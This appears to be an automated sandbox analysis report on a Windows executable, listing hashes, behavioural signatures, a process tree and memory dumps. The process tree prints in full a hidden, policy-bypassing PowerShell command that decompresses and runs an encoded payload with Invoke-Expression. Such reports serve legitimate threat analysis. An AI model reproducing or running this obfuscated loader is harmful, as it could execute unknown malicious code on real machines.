8742e6ee82627b93f5c2eb36b1b5a4af441e5ec5533a11a769bb657cde1825b4

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
11/03/2024, 06:36

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

c018cfd41b2b4159be7b936d5c58dd61.exe
Size

90KB
MD5

c018cfd41b2b4159be7b936d5c58dd61
SHA1

f99796a8fd8fbbc8b3b7e9379d3ae22a65426559
SHA256

8742e6ee82627b93f5c2eb36b1b5a4af441e5ec5533a11a769bb657cde1825b4
SHA512

e4e6347b3b296d1f9721becff8ad397a505074e9065776c05b406758eb037f0d89949a1d249426dc0149355c881dd9904e5da8a84917686344a1ad3adfae9fe0
SSDEEP

1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfwwxOT:v7DhdC6kzWypvaQ0FxyNTBfwT

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1544	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1544	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1544	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2212 wrote to memory of 1432	2212	c018cfd41b2b4159be7b936d5c58dd61.exe	29
PID 2212 wrote to memory of 1432	2212	c018cfd41b2b4159be7b936d5c58dd61.exe	29
PID 2212 wrote to memory of 1432	2212	c018cfd41b2b4159be7b936d5c58dd61.exe	29
PID 2212 wrote to memory of 1432	2212	c018cfd41b2b4159be7b936d5c58dd61.exe	29
PID 1432 wrote to memory of 1544	1432	cmd.exe	30
PID 1432 wrote to memory of 1544	1432	cmd.exe	30
PID 1432 wrote to memory of 1544	1432	cmd.exe	30
PID 1432 wrote to memory of 1544	1432	cmd.exe	30

C:\Users\Admin\AppData\Local\Temp\c018cfd41b2b4159be7b936d5c58dd61.exe
"C:\Users\Admin\AppData\Local\Temp\c018cfd41b2b4159be7b936d5c58dd61.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2212
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2185.tmp\2186.tmp\2187.bat C:\Users\Admin\AppData\Local\Temp\c018cfd41b2b4159be7b936d5c58dd61.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1432
- - C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPvT9swEP2ev+IURSJRkygtBXVFSPxSN6StQxRtH6p+SN2Dejh2ZF/aBtb/fRdIt4HYNO1LnmPfvfd8dw4EHMOJ700vlLosSmMp9O/RalT7vXShlB/NoKzmSgpwlBMDbojP4VLTFVn4Ii1VuTpVyoiw3VvHUElNsGmxbvEhOvpvnXOLOeHNkmGx06la3lUMv5Tb1W/a7U6j7p94ZOvHwPGlx7hOPs+/oSCY1I6wSMdI6cSIeyTXIoTTN85OFwuLzo3yQqp6NhyyAFoOWBt7H8NbGc94U5fI4RPiSxRvB15ZQ0YY1YbeiDLyApeeG63ZaLjXfddLu4eDlL/9vRgG2SCL4DuYihJdKXUEQclXm55amzfOnqt2qbmkWmDoz2tCP4Z+xIEbDmTqaxQoVxgG5SuiBz7PvKD+B77pmSS2uELLhWhsGy7Jfo854yzqHDRq9TSbNYSbs5G3XkqFELJCoujvyRE8Nk46L63WcfDQOYi78Z9rPVL5nWO2sdEYwda7NZYV5XGXvUjWReg3q06HFdhcIBt3O7pXjt4jnfFFXTjliZqxkQ+5XiiMOCvpzrZeQJzLQ5E0XYOkwGKO9gJvpZYkjYZAQDLOCwT/q9T7PR8SzX+uzAXC086o0qKJdJCUuXO0tFXToOOAhsMXDyyLgzr9iPqOlnG22c+yjKGfRd7O+XWlSRaYPo2kKSdoV1KgSz/l1i1z1bTQlHVTQci4b89PYxYGm3RX9iiK4acIDx/tut6+PVaMg03cwKvRm1BuKZkoxBKSCQqjFzA47GfZVuQklo/bHw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1544

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2185.tmp\2186.tmp\2187.bat

Filesize
1KB

MD5
fb6a62164d69eff45e4cec0572d39ba7

SHA1
15e376e40adfaf40306161ebd222943cd4975278

SHA256
d5c12d005a09efb8b2a43e01256b4d7cb2a698920b6d9faa6ab3c5c7ccd5fab4

SHA512
ddb39e42fa733445346dae156f29fc77fbabd77eb0d794e2814c5cf56f41afa37bd5f61c000efb3aa1e5862cbe1738a4f3dfe2f51115d8a0e05cb309a06ea7f3

Download Submit
memory/1544-4-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/1544-8-0x0000000002900000-0x0000000002940000-memory.dmp

Filesize
256KB

Download
memory/1544-7-0x0000000002900000-0x0000000002940000-memory.dmp

Filesize
256KB

Download
memory/1544-6-0x0000000002900000-0x0000000002940000-memory.dmp

Filesize
256KB

Download
memory/1544-5-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/1544-9-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/1544-10-0x0000000002900000-0x0000000002940000-memory.dmp

Filesize
256KB

Download
memory/1544-11-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download